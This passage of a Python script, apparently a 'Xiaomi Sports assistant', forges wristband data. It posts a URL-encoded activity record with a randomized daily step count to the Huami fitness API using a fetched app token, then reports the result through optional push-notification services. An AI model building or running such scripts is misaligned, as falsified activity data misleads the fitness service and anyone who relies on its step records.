fgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAA%22%2C%22tz%22%3A32%2C%22did%22%3A%22DA932FFFFE8816E7%22%2C%22src%22%3A24%7D%5D%2C%22summary%22%3A%22%7B%5C%22v%5C%22%3A6%2C%5C%22slp%5C%22%3A%7B%5C%22st%5C%22%3A1628296479%2C%5C%22ed%5C%22%3A1628296479%2C%5C%22dp%5C%22%3A0%2C%5C%22lt%5C%22%3A0%2C%5C%22wk%5C%22%3A0%2C%5C%22usrSt%5C%22%3A-1440%2C%5C%22usrEd%5C%22%3A-1440%2C%5C%22wc%5C%22%3A0%2C%5C%22is%5C%22%3A0%2C%5C%22lb%5C%22%3A0%2C%5C%22to%5C%22%3A0%2C%5C%22dt%5C%22%3A0%2C%5C%22rhr%5C%22%3A0%2C%5C%22ss%5C%22%3A0%7D%2C%5C%22stp%5C%22%3A%7B%5C%22ttl%5C%22%3A18272%2C%5C%22dis%5C%22%3A10627%2C%5C%22cal%5C%22%3A510%2C%5C%22wk%5C%22%3A41%2C%5C%22rn%5C%22%3A50%2C%5C%22runDist%5C%22%3A7654%2C%5C%22runCal%5C%22%3A397%2C%5C%22stage%5C%22%3A%5B%7B%5C%22start%5C%22%3A327%2C%5C%22stop%5C%22%3A341%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A481%2C%5C%22cal%5C%22%3A13%2C%5C%22step%5C%22%3A680%7D%2C%7B%5C%22start%5C%22%3A342%2C%5C%22stop%5C%22%3A367%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A2295%2C%5C%22cal%5C%22%3A95%2C%5C%22step%5C%22%3A2874%7D%2C%7B%5C%22start%5C%22%3A368%2C%5C%22stop%5C%22%3A377%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1592%2C%5C%22cal%5C%22%3A88%2C%5C%22step%5C%22%3A1664%7D%2C%7B%5C%22start%5C%22%3A378%2C%5C%22stop%5C%22%3A386%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1072%2C%5C%22cal%5C%22%3A51%2C%5C%22step%5C%22%3A1245%7D%2C%7B%5C%22start%5C%22%3A387%2C%5C%22stop%5C%22%3A393%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1036%2C%5C%22cal%5C%22%3A57%2C%5C%22step%5C%22%3A1124%7D%2C%7B%5C%22start%5C%22%3A394%2C%5C%22stop%5C%22%3A398%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A488%2C%5C%22cal%5C%22%3A19%2C%5C%22step%5C%22%3A607%7D%2C%7B%5C%22start%5C%22%3A399%2C%5C%22stop%5C%22%3A414%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A2220%2C%5C%22cal%5C%22%3A120%2C%5C%22step%5C%22%3A2371%7D%2C%7B%5C%22start%5C%22%3A415%2C%5C%22stop%5C%22%3A427%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1268%2C%5C%22cal%5C%22%3A59%2C%5C%22step%5C%22%3A1489%7D%2C%7B%5C%22start%5C%22%3A428%2C%5C%22stop%5C%22%3A433%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A152%2C%5C%22cal%5C%22%3A4%2C%5C%22step%5C%22%3A238%7D%2C%7B%5C%22start%5C%22%3A434%2C%5C%22stop%5C%22%3A444%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A2295%2C%5C%22cal%5C%22%3A95%2C%5C%22step%5C%22%3A2874%7D%2C%7B%5C%22start%5C%22%3A445%2C%5C%22stop%5C%22%3A455%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1592%2C%5C%22cal%5C%22%3A88%2C%5C%22step%5C%22%3A1664%7D%2C%7B%5C%22start%5C%22%3A456%2C%5C%22stop%5C%22%3A466%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1072%2C%5C%22cal%5C%22%3A51%2C%5C%22step%5C%22%3A1245%7D%2C%7B%5C%22start%5C%22%3A467%2C%5C%22stop%5C%22%3A477%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1036%2C%5C%22cal%5C%22%3A57%2C%5C%22step%5C%22%3A1124%7D%2C%7B%5C%22start%5C%22%3A478%2C%5C%22stop%5C%22%3A488%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A488%2C%5C%22cal%5C%22%3A19%2C%5C%22step%5C%22%3A607%7D%2C%7B%5C%22start%5C%22%3A489%2C%5C%22stop%5C%22%3A499%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A2220%2C%5C%22cal%5C%22%3A120%2C%5C%22step%5C%22%3A2371%7D%2C%7B%5C%22start%5C%22%3A500%2C%5C%22stop%5C%22%3A511%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1268%2C%5C%22cal%5C%22%3A59%2C%5C%22step%5C%22%3A1489%7D%2C%7B%5C%22start%5C%22%3A512%2C%5C%22stop%5C%22%3A522%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A152%2C%5C%22cal%5C%22%3A4%2C%5C%22step%5C%22%3A238%7D%5D%7D%2C%5C%22goal%5C%22%3A8000%2C%5C%22tz%5C%22%3A%5C%2228800%5C%22%7D%22%2C%22source%22%3A24%2C%22type%22%3A0%7D%5D'
    
    finddate = re.compile(r'.*?date%22%3A%22(.*?)%22%2C%22data.*?')
    findstep = re.compile(r'.*?ttl%5C%22%3A(.*?)%2C%5C%22dis.*?')
    data_json = re.sub(finddate.findall(data_json)[0], today, str(data_json))
    data_json = re.sub(findstep.findall(data_json)[0], step, str(data_json))
      
    url = f'https://api-mifit-cn.huami.com/v1/data/band_data.json?&t={t}'
    head = {
        "Content-Type": "application/x-www-form-urlencoded",
        'apptoken': f'{app_token}'
        }
    data = f'userid={userid}&last_sync_data_time=1597306380&device_type=0&last_deviceid=DA932FFFFE8816E7&data_json={data_json}'
   
    response = requests.post(url, data=data, headers=head).json()
    print(response)
    result = f"当前用户：{user}</br> 修改步数： {step}  </br> 修改结果: "+ response['message']
    server_send(result)
    qmsg_send(result)
    plus_send(result)
    print(result)
    return result
    
#获取时间戳
def get_time():
    url = 'http://api.m.taobao.com/rest/api3.do?api=mtop.common.getTimestamp'
    response = requests.get(url,headers=headers).json()
    t = response['data']['t']
    return t
    
#获取app_token
def get_app_token(login_token):
    url = f"https://account-cn.huami.com/v1/client/app_tokens?app_name=com.xiaomi.hm.health&dn=api-user.huami.com%2Capi-mifit.huami.com%2Capp-analytics.huami.com&login_token={login_token}&os_version=4.1.0"
    response = requests.get(url,headers=headers).json()
    app_token = response['token_info']['app_token']
    print("app_token获取成功！")
    print(app_token)
    return app_token
   
#server酱微信推送
def server_send(msg):
    if sckey == '':
        return
    server_url = "https://sc.ftqq.com/" + str(sckey) + ".send"
  
    data = {
            'text': msg,
            'desp': msg
        }
    requests.post(server_url, data=data)
  
#Qmsg酱QQ推送
def qmsg_send(msg):
    if qkey == '':
        return
    qmsg_url = "https://qmsg.zendee.cn:443/send/" + str(qkey)
  
    data = {
            'qq': f'{qq}',
            'msg': msg
        }
    requests.post(qmsg_url, data=data)
 
# PUSHPLUS推送
def plus_send(msg,title='小米运动助手',template ='markdown'):
    if plustoken == '':
        return
    url = 'http://www.pushplus.plus/send'
    data = {
        "token": plustoken,
        "title": title,
        "content": msg,
        "template":template
    }
    body = json.dumps(data).encode(encoding='utf-8')
    headers = {'Content-Type': 'application/json'}
    response = requests.post(url, data=body, headers=headers)
    if response.status_code ==200:
        return 1
    return 0
 
# -- 配置 --
# ------------------------------
user = "136****1234" #小米运动账号
password = "123456"  #密码
step = str(randint(18000,25000))  # 范围内取随机数， 前面不但能大于后面的数
  
#以下为信息推送，不懂的可不填写不影响刷步
sckey = ''  # server酱微信推送key(不懂不要填，可空)
qkey = '' # Qmsg酱QQ推送key(不懂不要填，可空)
qq= ''   # 需要推送的qq号 (不懂不要填，可空)
plustoken = '' #PUSHPLUS的token 官网为https://www.pushplus.plus/(不懂不要填，可空)
  
# ------------------------------
  
# def main_handler(event, context):
#     return main()
 
# 阿里云函数
def handler(*args):  
    main()
  
if __name__ == '__main__':
    main()